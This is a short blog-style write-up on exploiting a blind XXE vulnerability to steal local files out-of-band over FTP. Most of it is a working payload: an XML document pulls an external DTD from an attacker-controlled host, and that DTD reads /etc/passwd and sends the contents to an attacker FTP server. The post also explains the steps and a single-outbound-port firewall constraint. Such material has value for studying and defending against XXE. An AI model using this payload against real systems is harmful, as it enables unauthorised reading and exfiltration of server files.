Suppose we have discovered a XXE-vulnerability and trying to do blind OOB local files content extraction.
There are some different ways to do this. I recently had to use FTP-extraction (AFAIK, this was due to vulnerable service Java version – it didn’t allowed the HTTP-extraction of some files, e.g.
I have used the following vector:
< ?xml version="1.0" ?>
< !DOCTYPE r [
<!ELEMENT r ANY >
< !ENTITY % sp SYSTEM "http://host:1111/ext.dtd">
and have place at
http://host:1111/ext.dtd the following DTD:
< !ENTITY % data SYSTEM "file:///etc/passwd">
< !ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://host:2222/%data;'>">
This works the following way:
1. Processing the XML source, vulnerable app loads external DTD schema via HTTP from
2. Processing the loaded schema, the app loads local file
/etc/passwd and tries to load external entity
exfil via FTP from
ftp://host:2222/%data;, where the
%data; is replaced by
/etc/passwd content by XML parser. Thus, if we control the FTP server, we can easily read extracted data.
And everything would be fine, but the vulnerable server firewall has allowed only
3785 port outgoing connections, and we needed to make 2 requests: over HTTP and then over FTP. So, I had to think, how to process both protocols using one single port 🙂